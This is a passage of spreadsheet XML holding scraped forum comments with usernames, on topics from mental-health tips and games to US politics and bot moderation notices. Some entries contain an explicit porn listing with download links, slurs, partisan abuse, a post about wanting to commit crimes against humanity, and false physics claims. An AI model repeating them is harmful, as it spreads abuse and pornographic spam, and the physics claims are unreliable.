    <t>Be aware of your emotions and reactions. Don’t suppress them, but don’t indulge in the negative ones for too long. Taking care of yourself goes a long way in preventing severe symptoms, and reducing the impact of the symptoms that still make it through. Eat well, exercise, sleep enough, have meaningful relationships, minimize use of substances, do productive things with your time, etc. Take meds if you need them, but also take actions to improve coping skills and the life circumstances that you can influence. Meds alone are usually not enough, though they are very helpful to get people to a place where they can start working on making changes. Action alone may not be enough for some people. Find the combo that works for you! Do the things that stimulate neurotransmitter function - being kind, being active, having healthy relationships, chasing your passions, etc. A diagnosis is not an identity. Spend more time on the things that make you an amazing, interesting human, than on the things that define your diagnosis. Don’t be an asshole. Being deliberately negative is bad for your mental health AND the mental health of others around you. Reach out to people who seem to be struggling. You won’t be able to fix it, but you can help another person feel less alone. Reach out to people who don’t seem to be struggling too, because you never know who might need a bit of kindness or a listening ear. Remember that there is a LOT going on developmentally, socially, financially, and functionally between the age of 13 and 30. It’s ok to be a bit messy, confused, disheartened, frustrated, and uncomfortable. That’s normal. It gets better for most people.</t>
  </si>
  <si>
    <t>keng3</t>
  </si>
  <si>
    <t>Can second this as they have great food for decent prices.</t>
  </si>
  <si>
    <t>&gt;&gt;15581001 &gt;Butt licking disclaimer You gotta clean out your butt hole and wash your ass before you do anything like this. You probably should not eat before hand either. Skip Lunch.</t>
  </si>
  <si>
    <t>Bysne</t>
  </si>
  <si>
    <t>So what? If you are willing to learn and you did it that well. Then you showed enough maturity. It is sad, but it is ok. I am happy that you enjoyed it and saw it that way. \^\^</t>
  </si>
  <si>
    <t>cynikalAhole99</t>
  </si>
  <si>
    <t>how are you with computers?</t>
  </si>
  <si>
    <t>The above submission has been **removed** because: * It does not appear to contain a tl;dr or any sort of short summary. Please create anew post including a tl;dr. Refer to FAQ: [What is TL;DR? Why do I need it?](http://www.reddit.com/r/relationships/wiki/index#wiki_what_is_tl.3Bdr.3F_why_do_i_need_it.3F) for some pointers. If you feel you are receiving this message in error, please [contact the moderators](http://www.reddit.com/message/compose?to=%2Fr%2Frelationships⊂ject=Submission+removed+for+no+TLDR&amp;message=My+post+can+be+found+at:+https://www.reddit.com/r/relationships/comments/d491ig/i_have_a_crush_on_my_friend_does_he_like_me_back/) and include your problem Please note if you feel your post is too short for a tl;dr we will likely consider it too short to get meaningful input. You must make a new post with the amended information. Please ensure that the submission complies to **all the rules** listed in the sidebar, and in the [wiki](/r/relationships/wiki/index#wiki_about_.2Fr.2Frelationships) (relevant for mobile users). When you are done, please repost your submission. --- *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/relationships) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>1992vapor</t>
  </si>
  <si>
    <t>First off, the world is changing. The gender and sexuality movement are huge these days, and its only getting bigger. Its being more and more accepted by many. But at the same time, the voices of people disagreeing with the movement are getting more and louder than ever, because they feel its being pushed on them more than ever. Its also getting crazier and more elaborate every year. We've gone from LGB to LGBT to LGBTQ+ in a span of 10-15 years. The same scenario is happening with skin color and racism. Racism has always been a big topic, except that nowadays its almost done a 180° and now there's fire from both sides. Subreddits like BPT are asking for forearm checks to prove you're black so you can join - but of course this isn't exclusive to reddit or the internet. "Cultural Appropriation" is a new term that spawned sometime in the last years. And then you've got all the people from the other side of the spectrum who are now being categorized as "alt-right" and stuff like that, and they are fighting back and voicing their views more than ever too. Another topic is the capitalist vs communist/socialist trend. Weirdly there is this large spike of "internet communists" and things like that. Disparities in all societal regions are getting larger and larger. Trump divided the population even further, not even through anything he said but simply by existing and being elected. Suddenly every side feels the need to fight for their voices and views, making for more extreme environments than ever. And now comes the cherry on top - the internet is the wood keeping the fire churning. Its a literal boiling point where all the views come together. The internet is a place where all these people can voice their opinions, (mostly) without repercussions. Everyone can have a safe space and an echo chamber here, and sometimes they overlap. This facilitates outrage, hatred and indoctrination. I think that all these things are going to get worse, and eventually there will be a breaking point where we as a society will start facing massive problems, manifested in the real world. The social disparities are getting larger every year. Every year there seem to be more "SJWs" and more "alt-righters" and another letter added to the LGBTQ+ terms and another trump voter.</t>
  </si>
  <si>
    <t>happysmash27</t>
  </si>
  <si>
    <t>I see all the long names of animals as more diminutive, myself. Names like "danger noodle" are just so silly \^ω\^ ! My first guess for which name was made up was "velocirabbit", as it was unfamiliar, but on second thought, now I am leaning more towards "floppy sea spider" and "giraffe sheep", as "floppy sea spider" seems a bit long, and "giraffe sheep" seems less diminutive than the others, and more like a serious name. I think I will put "giraffe sheep" as my guess.</t>
  </si>
  <si>
    <t>ThatGuyEli-jah</t>
  </si>
  <si>
    <t>That rat has the infinity grill</t>
  </si>
  <si>
    <t>EatTheRich</t>
  </si>
  <si>
    <t>afella said: ↑ I think he may have seriously hampered the democrats 2020 aspirations. Remember the times we live in. Substance, policy, and credibility mean nothing right now. Party affiliation does. His statement potentially turned off a bunch of moderate/independent voters who are sick of trump, but not sick enough of him to vote for firearms confiscation. Think rural DFL or rural moderates. He may have squandered the democrats chance at taking back the white house. Click to expand... Or Trump will jump on his bandwagon rather than alienate a bunch of urban voters.</t>
  </si>
  <si>
    <t>Shadao</t>
  </si>
  <si>
    <t>Ash. The preview reminds me so much of the one for his battle with Alain. Showing lots of clips of the battle and certain scenes, but nothing of the actual winner. It feels like a massive case of Déjà Vu, especially with the ambiguous narration (even without subs, I think I could make out Kukui thanking both Ash and Gladion). ....I'm less at peace with it than I thought I'd be, but also more at peace with it than I realized at the same time. Of course, I could also be wrong. We'll see. Obviously they won't show the winner. We can't let the kids figure out what's the correct answer for the lottery to Hawaii. As I've stated before, Gladion has somehow reduced this entire Alola League finals... into a typical grudge match between the Lycanroc forms. And his Lycanroc is not invincible unlike Mega Charizard X. Looking back at the previous League "dream crushers," we have: A very powerful One-Man Army Mega Charizard X that hasn't been defeated by anyone due to being juiced by Team Flare's training. A sudden Wild Card mid-battle evolution that is Lucario. A Legendary Pokémon that no one saw coming at all aka Latios. The Ace Meowth that Pikachu has never battled before. And a brand-new, Hoenn promotion known as Blaziken who gives Charizard the Worf Effect to show how badass this new Fire Starter is. Based on previous trends, Gladion's Silvally or Zoroark would have been the decisive blow against Ash since we have an unbeatable Silvally and a Zoroark that nobody saw coming. Yet... both have been (or will be for Zoroark) knocked out, and thus the decisive factor is the Lycanroc rivalry. A rivalry that has been around since Ash's Lycanroc was a little Rockruff. Oh, and Zoroark wasted the Z-Move while Ash hasn't used his... yet. Maybe Gladion should have reserved Silvally as his last Pokémon rather than his first. Edited by Shadao on Sep 8th 2019 at 11:53:15 AM Here's the Sink: Hate Sink Drafts | Hate Sink Dates | Hate Sink To Do Lists | Pending Write-Ups</t>
  </si>
  <si>
    <t>Fortolaze</t>
  </si>
  <si>
    <t>Thanks so much for your help! I'll also check out that app.</t>
  </si>
  <si>
    <t>mantene</t>
  </si>
  <si>
    <t>Narrator: We gave the world's clumsiest mad a gun and told him to rob this store. Let's see what happens.</t>
  </si>
  <si>
    <t>Psuedo-Nymgames</t>
  </si>
  <si>
    <t>It was meant to be sarcastic.</t>
  </si>
  <si>
    <t>oppvm</t>
  </si>
  <si>
    <t>yeah man, that's the way!</t>
  </si>
  <si>
    <t>Lord_Hendrick</t>
  </si>
  <si>
    <t>A loud bang through the wall followed by an anguished "OW"</t>
  </si>
  <si>
    <t>90 50</t>
  </si>
  <si>
    <t>JOE QUEEF said: ↑ I hope it follows that exact line straight to the North Pole. Fuck Canada, eh? Click to expand... It’s their turn, we just got hit with flooding again, need a break.</t>
  </si>
  <si>
    <t>Selling a signed and framed poster of hawthorn champion Lance Franklin must sell</t>
  </si>
  <si>
    <t>RemindMeBot</t>
  </si>
  <si>
    <t>I will be messaging you on [**2019-09-26 19:33:52 UTC**](http://www.wolframalpha.com/input/?i=2019-09-26%2019:33:52%20UTC%20To%20Local%20Time) to remind you of [**this link**](https://np.reddit.com/r/Backcountry/comments/d957lf/ski_width_reccommendations/f1fa54z/) [**CLICK THIS LINK**](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5Bhttps%3A%2F%2Fwww.reddit.com%2Fr%2FBackcountry%2Fcomments%2Fd957lf%2Fski_width_reccommendations%2Ff1fa54z%2F%5D%0A%0ARemindMe%21%202019-09-26%2019%3A33%3A52%20UTC) to send a PM to also be reminded and to reduce spam. ^(Parent commenter can ) [^(delete this message to hide from others.)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Delete%20Comment&amp;message=Delete%21%20d957lf) ***** |[^(Info)](https://np.reddit.com/r/RemindMeBot/comments/c5l9ie/remindmebot_info_v20/)|[^(Custom)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5BLink%20or%20message%20inside%20square%20brackets%5D%0A%0ARemindMe%21%20Time%20period%20here)|[^(Your Reminders)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=List%20Of%20Reminders&amp;message=MyReminders%21)|[^(Feedback)](https://np.reddit.com/message/compose/?to=Watchful1⊂ject=RemindMeBot%20Feedback)| |-|-|-|-|</t>
  </si>
  <si>
    <t>tigerears</t>
  </si>
  <si>
    <t>Unless it has changed, I dislike how sub stylesheets cannot be disabled. I much prefer the homogenous experience of old reddit, for a more consistent experience across the site that doesn't require me to process information differently every time I switch subs.</t>
  </si>
  <si>
    <t>Radagar</t>
  </si>
  <si>
    <t>Damage doesnt alter toughness in any situation. In your scenario you have a 0/2 which has 1 damage marked. This damage is less than the toughness of 2, so the creature is alive. Once the -1/-1 is applied you have a 0/1 with 1 damage marked. Since the new toughness is equal to marked damage the creature is destroyed. Indestructible does not allow marked damage to kill a creature, so long as it has at least one remaining toughness and indestructible a creature can have infinite marked damage without being destroyed. If we use video game terms toughness is max hp and damage applies to current hp. No matter how much damage is applied, your max hp does not change. But if you reach 0 current, you die. If you are indestructible you dont die upon reaching 0 current hp. But if those -x spells or counters reduce your max hp to 0, you die immediately and indestructible cannot save you.</t>
  </si>
  <si>
    <t>i know that like the cia reads every post on 4chan with a bot but like i am a disenfranchised loser and i want to commit crimes against humanity</t>
  </si>
  <si>
    <t>Bobtoddwilliams1234</t>
  </si>
  <si>
    <t>Hopefully not Republicans need to go scorched earth and use whatever they can to prevent democrat from destroying the country with the racist democrat agenda I'm in the Democrats literally put a racist conspiracy theorist as the head of the house investigative committee (ocasio) and honestly the people of North Carolina voted mostly for republicans. And the Democrat Governor is getting in the way Republicans need to prevent the racist current district lines</t>
  </si>
  <si>
    <t>Lola910</t>
  </si>
  <si>
    <t>I think you mean not animorphs? I have no idea what it could be but you may want to repost clarifying if it’s not animorphs.</t>
  </si>
  <si>
    <t>fubar_droid</t>
  </si>
  <si>
    <t>5 is the average damage... so if u wanted to save time, you could say... droop shoots the hostile goblin for 5 dmg. RTher than rolling the die+mod listed in parentheses (1d6+2) Avg of a d6 is 3, +2 for mod, avg dmg = 5 Every die above 1st has a average + of .5 so if 2d6+4, avg would b 7+2 = 9</t>
  </si>
  <si>
    <t>5nurp5</t>
  </si>
  <si>
    <t>your bike is pretty loud. do you ride with earplugs?</t>
  </si>
  <si>
    <t>Eric_Style</t>
  </si>
  <si>
    <t>Get half a dog</t>
  </si>
  <si>
    <t>Agent 42</t>
  </si>
  <si>
    <t>it's a bit of a conundrum, if you really really like the guitar, the path gets a little more clear. A little more information may be helpful. 1. What is the age of the guitar, what year was it made? 2. do you have a dual action or single action truss rod? some of the earlier models Sheratons have a one-way truss rod. meaning you sometimes cannot create more relief, and or stabilize the neck, you can run out of adjustability with a one-way truss rod. If you have a 2 way truss rod that can give you some potential additional control. 3. how much emotional attachment? does it have some magic?. The newer models are pretty impressive. A re-fret with a PLEK, would absolutely make the guitar reborn. However my last re-fret with a PLEK was $525. So that's why if you really really love the guitar, i.e. like the tone is somehow perfect, the pickups are perfect, the aging is perfect. you might like to spend the money. But it's a lot like owning an older car, and while parking you bump the bumper into the light pole at the grocery store,you smash the grill and the bumper, and they are $3000 to fix on your $2500 car. the car drives fine, so you go for the duct tape. You are at the point where unfortunately the guitar is almost totaled. the Band-Aid approach would be to not worry about the fretboard and try to level the frets only to the strings, perhaps a $200 PLEK or a $100 hand leveling, could level the offending frets, however you then have very low fret material remaining. this would have to assume the neck is done moving, which is usually the case, it moves and twists into a stable low-energy state and becomes more stable. But that could be a very satisfactory approach. if the guitars particularly loved. The other obvious choice is to buy a brand-new Sheraton for the same price as a PLEK.</t>
  </si>
  <si>
    <t>Xervo5</t>
  </si>
  <si>
    <t>No probs and nah its not that it’s just I’m having a boring time with other game console. But I actually like hunting ha so yea.</t>
  </si>
  <si>
    <t>jonnyjonnystoppapa</t>
  </si>
  <si>
    <t>You're comparing the graphic quality and performance of Rocket League to Overwatch. Fuckin lol</t>
  </si>
  <si>
    <t>tokenDragon3820</t>
  </si>
  <si>
    <t>You right i think one time he told me ‘you look nice’ and i told him back ‘you look cute, too’ and i think he probably thinks he’s friendzoned.....i blurted it out completely and now i’m thinking maybe i ruined that for myself...</t>
  </si>
  <si>
    <t>Chester_Mass</t>
  </si>
  <si>
    <t>No, for being a dick about that opinion. You can have a different one but being rude, hateful and obnoxious about it is ridiculous. &gt;Then you play the victim when I come off exactly the way you did when you replied to my post. What on Earth are you talking about? &gt;Offended because people don't share your right wing point of view. 1) I'm not 2) If I was, it wouldn't be an insult 3) **How Is Saying "Murder Is Bad" A Controversial Statement!?**</t>
  </si>
  <si>
    <t>lolix007</t>
  </si>
  <si>
    <t>the bookmakers are also riding high on fpx. they have it at second.</t>
  </si>
  <si>
    <t>Jumpy-cricket</t>
  </si>
  <si>
    <t>Using little towels instead of wipes that we wash</t>
  </si>
  <si>
    <t>kutemarkie8</t>
  </si>
  <si>
    <t>Hi! I'm a ZSS main, but people tell me that me and her don't really click. I was wondering if anyone here was willing to check out my video [here](https://youtu.be/RG2aKS31gvk) and critique things I do wrong and what I should fix as a player. I don't know personally the skill level of the peach player, but they seemed to have an understanding of the game on a basic level. Don't be afraid to tell me if there's something I'm doing a lot! I have previous issues with her, like rolling and using paralyzer a lot in neutral. I think my playstyle has gotten slightly more fluid, but I guess we'll have to see how that ends up being. Anyway, please help me out with this if you can! Thank you!</t>
  </si>
  <si>
    <t>I will be messaging you on [**2019-09-10 11:35:36 UTC**](http://www.wolframalpha.com/input/?i=2019-09-10%2011:35:36%20UTC%20To%20Local%20Time) to remind you of [**this link**](https://np.reddit.com/r/FortNiteBR/comments/czze7w/freedom_at_last/ez49hmk/) [**CLICK THIS LINK**](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5Bhttps%3A%2F%2Fwww.reddit.com%2Fr%2FFortNiteBR%2Fcomments%2Fczze7w%2Ffreedom_at_last%2Fez49hmk%2F%5D%0A%0ARemindMe%21%202019-09-10%2011%3A35%3A36%20UTC) to send a PM to also be reminded and to reduce spam. ^(Parent commenter can ) [^(delete this message to hide from others.)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Delete%20Comment&amp;message=Delete%21%20czze7w) ***** |[^(Info)](https://np.reddit.com/r/RemindMeBot/comments/c5l9ie/remindmebot_info_v20/)|[^(Custom)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=Reminder&amp;message=%5BLink%20or%20message%20inside%20square%20brackets%5D%0A%0ARemindMe%21%20Time%20period%20here)|[^(Your Reminders)](https://np.reddit.com/message/compose/?to=RemindMeBot⊂ject=List%20Of%20Reminders&amp;message=MyReminders%21)|[^(Feedback)](https://np.reddit.com/message/compose/?to=Watchful1⊂ject=RemindMeBot%20Feedback)| |-|-|-|-|</t>
  </si>
  <si>
    <t>Ren</t>
  </si>
  <si>
    <t>Had an issue with bugs at one point and bought a new mattress and it was kinda difficult to get it on but not terrible. Can tell a difference with being congested and noe im not with it on. Only dislike is it collects air under it so when you get on the bed theres like a big air bubble but then it goes away after a minute</t>
  </si>
  <si>
    <t>&gt;&gt;266933636 Not every deck fits into an exact archetype. There is a combo aspect if you manage 3feri + scapeshift but it's not what the deck's main strategy, unlike Kethis/storm/neobrand. Some decks were running Samut for the hasty zombies which is more into the combo territory. A deck having a strong combo doesn't make it a "combo deck". &gt;&gt;266934124 &gt;&gt;266933329 &gt;&gt;266932603 Be an autist somewhere else.</t>
  </si>
  <si>
    <t>nelfoo</t>
  </si>
  <si>
    <t>Your red is showing...</t>
  </si>
  <si>
    <t>&gt;&gt;22115467 Shittier like because you find them icky? or are hikikimoris actually worse like do they kill/maim more people/kids than pibbles for example?</t>
  </si>
  <si>
    <t>FlyCharlyPi</t>
  </si>
  <si>
    <t>Kyle saving the day.</t>
  </si>
  <si>
    <t>Claimence_</t>
  </si>
  <si>
    <t>Hi, today I had a appointment i take 2 month ago with an endoc. ... and yep, his secretary didn’t say me he was not very trans friendly. For him I need to proceed with a « local group », « nobody make this in the private, grow up » he said me ... Since i already had my psy. letter and test, i really though it’s gonna be the day. Any french people can help me ? (Already check bbdtrans but nothing near me, i know i can go to Paris, but it gonna be so long :( ) Thanks</t>
  </si>
  <si>
    <t>JCannonTech</t>
  </si>
  <si>
    <t>It says a citizen of the United States *at the time of the adoption of the constitution*. This is because none of the Founding Fathers were considered Natural Born citizens because the land was owned by Great Britain at the time. That provision has been irrelevant since the last British-born American citizens died in the mid 1800s. You are interpreting it entirely incorrectly. The “last sentence” you’re talking about begins with “neither”, not “either”, which means you have to be BOTH a natural born citizen AND have those qualifications. I promise you you’re wrong my friend.</t>
  </si>
  <si>
    <t>ForOne814</t>
  </si>
  <si>
    <t>You can say the same about drug production. Does it work that way?</t>
  </si>
  <si>
    <t>fuwhchehg</t>
  </si>
  <si>
    <t>Anyway, having a house in the crimson when you enter hardmode is a nightmare</t>
  </si>
  <si>
    <t>DRHav0c</t>
  </si>
  <si>
    <t>Thank you and we are happy we shared with you all!!!</t>
  </si>
  <si>
    <t>MLBStreamsBot2</t>
  </si>
  <si>
    <t>Indicate streams as [SD] or [HD] and Home or Away Please upvote the streams you like. Join our Discord server https://discord.gg/YkstqEk</t>
  </si>
  <si>
    <t>TheGhostGames</t>
  </si>
  <si>
    <t>Ranch with Cheese pizza</t>
  </si>
  <si>
    <t>donteatnada</t>
  </si>
  <si>
    <t>That's fucking brutal. Swallow your pride and at least lower it to all star or just request a trade to a better team.</t>
  </si>
  <si>
    <t>Bhima</t>
  </si>
  <si>
    <t>Hi, /u/Kendallkip! **Please read this entire message.** Your submission was removed from /r/trees for the following reason(s): * **Rule 5:** Low-quality link posts are disallowed outside of Saturday. This includes memes, image macros, screenshots, posts simply showing trees references (such as pineapples and “420”), posts simply about broken glassware and spilled bowls, and all posts not directly about cannabis (besides the title). You can make all those posts at /r/see during the week instead. See the [visual posting guide](http://imgur.com/a/1WL7J) showing types of disallowed posts. You're welcome to repost on Slack-Post Saturday each week though! Please read the rules [here](https://www.reddit.com/r/trees/wiki/rules), /r/trees faq [here](http://www.reddit.com/r/trees/wiki/faq), and take a look at our visual posting guide [here](http://imgur.com/a/1WL7J#fix) to ensure that your posts do not violate /r/trees posting rules. If you have any inquiries about the removal or the rules, please [send us a modmail](https://www\.reddit\.com/message/compose?to=%2Fr%2Ftrees⊂ject=about my removed submission&amp;message=I'm writing to ask why my submission: https://old.reddit.com/r/trees/comments/d99a2f/-/ was removed. %0D%0D). Please note that although mods are constantly working hard to remove the large volumes of posts that violate our rules, violating posts may sometimes make it to the front page. Use the report link to bring violating material to our attention. Thank you for your patience and understanding.</t>
  </si>
  <si>
    <t>Jhon004</t>
  </si>
  <si>
    <t>MOTM. Kept all the headers out, also drived and found space in the midfield. He is nailed and he can bring some bonus points with performances like this +CS</t>
  </si>
  <si>
    <t>chuby1tubby</t>
  </si>
  <si>
    <t>That’s amazingly complicated for something as mundane as trash!</t>
  </si>
  <si>
    <t>TedKings</t>
  </si>
  <si>
    <t>Pardon the clipping on some parts. My camera isn't good at handling audio peaks at times. I would say these are workable piano presets, no?</t>
  </si>
  <si>
    <t>x6o21h6cx</t>
  </si>
  <si>
    <t>Them being Muslim is a huge problem for China. China makes them change their name so they can’t have a Muslim spelling. “Sham” is changed to “xiam”. What the fuck</t>
  </si>
  <si>
    <t>&gt;&gt;110679358 Now open the window</t>
  </si>
  <si>
    <t>taylorcd08</t>
  </si>
  <si>
    <t>I hope you do too the waiting and not knowing is the worst! Xx</t>
  </si>
  <si>
    <t>JJQuinnyBoi</t>
  </si>
  <si>
    <t>It shows the bar as being full with 5gb but under data limit is says 30gb. Might try restarting my phone</t>
  </si>
  <si>
    <t>Fubarp</t>
  </si>
  <si>
    <t>What we all fantasized about doing to Ernie.</t>
  </si>
  <si>
    <t>SultanFox</t>
  </si>
  <si>
    <t>Woah dude your eyes are amazing - and that jawline!!</t>
  </si>
  <si>
    <t>goldieV3</t>
  </si>
  <si>
    <t>Well, at least he can’t get STDs anymore.</t>
  </si>
  <si>
    <t>MaryL</t>
  </si>
  <si>
    <t>I hate trump. I voted for him, because he was the lesser of two evils. I am an expatriate Democrat. I hate what passes for democrats so much now, I voted for a Orange skinned goblin to shove it up their asses. I want my party back, and so do the rest of us sane Americans.</t>
  </si>
  <si>
    <t>Potijelli</t>
  </si>
  <si>
    <t>Lol maybe read my comment right below this one. Literally said elon and buzzfeed can KO eachother for all i care. Elon being a douche tho doesnt make buzzfeed a good source. Nice attitude btw. Youre really going to change alot of ppls minds online with swearing and assumptions</t>
  </si>
  <si>
    <t>Mariani</t>
  </si>
  <si>
    <t>Did you set it on fire?</t>
  </si>
  <si>
    <t>jbean082019</t>
  </si>
  <si>
    <t>Ok, thanks guys! Glad I’m not the only one. Just sucks when I think he would sleep more if it wasn’t for this poop issue!</t>
  </si>
  <si>
    <t>RobertJKiddfucker</t>
  </si>
  <si>
    <t>The punishment for "not doing your part in a relationship" is not being cheated on. You can't be at fault for someone responding irrationally. I'll give you an example, if you leave someone on read and they throw acid in your face, you're not at fault for that. Could you have avoided it by "acting right" and not leaving them on read? Sure. Is it your fault you got acid thrown at you? Fuck no, because that's an absurd reaction to being left on read.</t>
  </si>
  <si>
    <t>Register</t>
  </si>
  <si>
    <t>bound and gagged Category: Bondage, Fetish, Pornstar Duration: 13 min 20 s Cast: Ashlee Graham Size: 134 MiB Resolution: 720 x 1280 Format: MPEG-4 Download: http://fboom.me/file/ed6b70a866f49 Milf punished with non stopasms Category: Blonde, Bondage, MILF Duration: 14 min 2 s Cast: Size: 139 MiB Resolution: 720 x 1280 Format: MPEG-4 Download: http://fboom.me/file/8c9105d91334d</t>
  </si>
  <si>
    <t>VorpalCudgel</t>
  </si>
  <si>
    <t>His voice isn't the same, but I still love it. His songwriting is as great as it ever was. Last Ditch, Fish in a Gun Barrel, Decline arranged with orchestral accompaniment, 7" club records have been good so far. He's still got it.</t>
  </si>
  <si>
    <t>prisoner2046</t>
  </si>
  <si>
    <t>Certain CAP Supervisors (and other positions) are getting Manager on Duty (MOD) training so they can be able to run the store if no one salaried is around. In those circumstances, MODs are over other hourly supervisors.</t>
  </si>
  <si>
    <t>h333h333</t>
  </si>
  <si>
    <t>Freakonomics, Science Vs,, and Casefiles.</t>
  </si>
  <si>
    <t>_BarkinMad_</t>
  </si>
  <si>
    <t>I put MO for state. I'll edit it if I can.</t>
  </si>
  <si>
    <t>Weedrunner, your post was removed due to a violation of rule 1: “Solicitation and/or sourcing”. Sourcing and/or solicitation of illegal substances or paraphernalia is not allowed in the /r/LSD subreddit. This includes discussion of vendors and markets. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/LSD) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>God_Damnit_Nappa</t>
  </si>
  <si>
    <t>You don't plea guilty to a speeding ticket. After 8 years it should've been thrown into the trash.</t>
  </si>
  <si>
    <t>skwerldom</t>
  </si>
  <si>
    <t>Totally. I don't enjoy it.</t>
  </si>
  <si>
    <t>Anonymous #1072</t>
  </si>
  <si>
    <t>I got nearly all 9s 8s and 7s in my GCSEs but i still feel like i’ve done awfully because i got two ‘lower’ grades.</t>
  </si>
  <si>
    <t>StlChase</t>
  </si>
  <si>
    <t>Stoneblock 1 and 2 have it.</t>
  </si>
  <si>
    <t>M4jorpain</t>
  </si>
  <si>
    <t>Fair enough, but they haven't released PC games in a long while right?</t>
  </si>
  <si>
    <t>Store Manager</t>
  </si>
  <si>
    <t>I worked Benefits, courtesy services, growth, work life balance. Cons Communication from the top is turrible Upper management should listen better</t>
  </si>
  <si>
    <t>inalluniversesatonce</t>
  </si>
  <si>
    <t>It's not possible to go faster than light, light is instantaneous. It is possible to go faster than C. You have time and light mixed up. C is the speed of time. The string theorist that say we're a 2 dimensional hologram projected onto the fabric of space is correct.</t>
  </si>
  <si>
    <t>JustMori</t>
  </si>
  <si>
    <t>I tried to ask her a contact but the one which I asked she didn’t have and I just left. xD that funny shit</t>
  </si>
  <si>
    <t>gunnvulcan73</t>
  </si>
  <si>
    <t>Good thing you shot this video, cuz im guessing the customer is gunna wanna know why the bill is 600 bucks plus parts.</t>
  </si>
  <si>
    <t>deliriousdrilling</t>
  </si>
  <si>
    <t>Probably 4 or 5 years ago. My brother. He argued he was faster, I proved he was not. We were about equal though. I was quicker when I was 30 lbs lighter and the speedster on my baseball team.</t>
  </si>
  <si>
    <t>ineyeseekay</t>
  </si>
  <si>
    <t>Hey, take the afternoon off to pay your respects, you'll get paid and I'm giving permission! *Yooooinnk just kidding, now that you're not here, all those not in attendance will have their pay docked and be reprimanded for skipping work* Genius move to destroy democracy and ensure no bipartisanship.</t>
  </si>
  <si>
    <t>Stantron</t>
  </si>
  <si>
    <t>I will cast my ballot for Liz W. Man or woman should not be a quandary.</t>
  </si>
  <si>
    <t>the_hunger</t>
  </si>
  <si>
    <t>the most? lol</t>
  </si>
  <si>
    <t>dustyh55</t>
  </si>
  <si>
    <t>Stage separation in high altitude. The large bloom expansion seems to be because of the low air pressure. Just in case the ELIN somehow didn't satisfy your curiosity.</t>
  </si>
  <si>
    <t>oryan_dunn</t>
  </si>
  <si>
    <t>Burnout on the bricks... forfeit the win, simple.</t>
  </si>
  <si>
    <t>IrmaHerms</t>
  </si>
  <si>
    <t>What?!? Fire is perfectly acceptable even up until the mercury drops to 20 below!</t>
  </si>
  <si>
    <t>perrythepeebottle</t>
  </si>
  <si>
    <t>No one cares retard</t>
  </si>
  <si>
    <t>namer98</t>
  </si>
  <si>
    <t>The newest one really reminds me of Rise Against, who I absolutely love. But the time it takes to keep up with music is more than I have wanted to put into it before. I spent a few hours this week looking up and listening to different things. A bunch of new pop-punk bands that remind me of the early 2000s are cropping up. I also now know I can't stand pop-punk anymore.</t>
  </si>
  <si>
    <t>Tatertaint</t>
  </si>
  <si>
    <t>Is that the first Unspoetsmanlike in Army history?</t>
  </si>
  <si>
    <t>danmarinofanclub</t>
  </si>
  <si>
    <t>Its literally political propaganda. Its trying to force us to take the side of the people getting sprayed with almost no evidence. I would bet half my paycheck OP is a leftist on a political level.</t>
  </si>
  <si>
    <t>&gt;&gt;68227748 &gt;Nearly a decade later and people are still posting a motivational poster I made Always warms my heart, thank you OP I still wish I wasn't an idiot and realized the motivational poster maker didn't need Quote: s though</t>
  </si>
  <si>
    <t>&gt;&gt;7846999 little bit of the BUBBLIN</t>
  </si>
  <si>
    <t>nobodysbuddyboy</t>
  </si>
  <si>
    <t>The hobbit hubby is cute imo.</t>
  </si>
  <si>
    <t>IMCP: I hope Trump keeps fighting. That's more stressful than just giving up</t>
  </si>
  <si>
    <t>&gt;&gt;476613574 Jesus fucking Christ it's so goddamned cool. I HAVE to rewatch the whole thing again. Thanks.</t>
  </si>
  <si>
    <t>Ton_Cixot</t>
  </si>
  <si>
    <t>But that's gintama for you. Sorachi lives to troll us he might even pair gintoki with kondo who knows what that madman will do</t>
  </si>
  <si>
    <t>pussy_doodle</t>
  </si>
  <si>
    <t>Maybe will creep up. I bought to 9/27. Will reminisce about that first spike</t>
  </si>
  <si>
    <t>Alan976</t>
  </si>
  <si>
    <t>Aw yes, the Car-Eating Tree. Lesser known cousin to to Kite-Eating Tree.</t>
  </si>
  <si>
    <t>Questionable</t>
  </si>
  <si>
    <t>You certainly aren't alone!! I have 3 too -5.5yo, 3yo and 3 months old. The early weeks have been tough. So hard when the baby takes up a lot of time and the older kids hover around, make noise, want attention, make a mess, need help with different things etc. All normal kid stuff but it's hard to spread your attention amongst everyone and also enjoy the baby! It's starting to slowly get better for me, but far from perfect still. Hang in there X</t>
  </si>
  <si>
    <t>Noryln</t>
  </si>
  <si>
    <t>Glad to be in the fucked period where it's expected to buy a house but you can't but it's still not the climate wars yet?</t>
  </si>
  <si>
    <t>skyguys_</t>
  </si>
  <si>
    <t>I wouldn't be surprised if half of the shotguns had nerf bullets in them either</t>
  </si>
  <si>
    <t>Bot_Metric</t>
  </si>
  <si>
    <t>Lol. When I can get mids for $99 Canadian per ounce (probably less if I buy a quarter pound). Filling one might be fun - **56.7 grams**, but oh my goodness all the slobber on the filter. I mean, people will talk of the party for ages and it might cement the BA nature of the person who did it. For $200. If you have people chipping in for food and other entertainment it might be worth it. _____ ^(I'm a bot) ^| ^[Feedback](https://www.reddit.com/message/compose?to=Ttime5) ^| ^[Stats](https://www.reddit.com/message/compose?to=Bot_Metric⊂ject=stats&amp;message=Sent%20this%20message%20to%20get%20some%20stats) ^| ^[Opt-out](https://www.reddit.com/message/compose?to=Bot_Metric⊂ject=Don't%20reply%20to%20me&amp;message=If%20you%20send%20this%20message,%20I%20will%20no%20longer%20reply%20to%20your%20comments%20and%20posts.) ^| ^(v5.1)</t>
  </si>
  <si>
    <t>BilboMuggins</t>
  </si>
  <si>
    <t>Loneliness can happen anywhere... Try and find activities/ social clubs around the place you live that you love to enjoy doing, whether it be running club/hiking club, yoga or meditation. People in those clubs won't judge you for how you look more so you'll be sharing the mutual love for something and that's how bonds are created.</t>
  </si>
  <si>
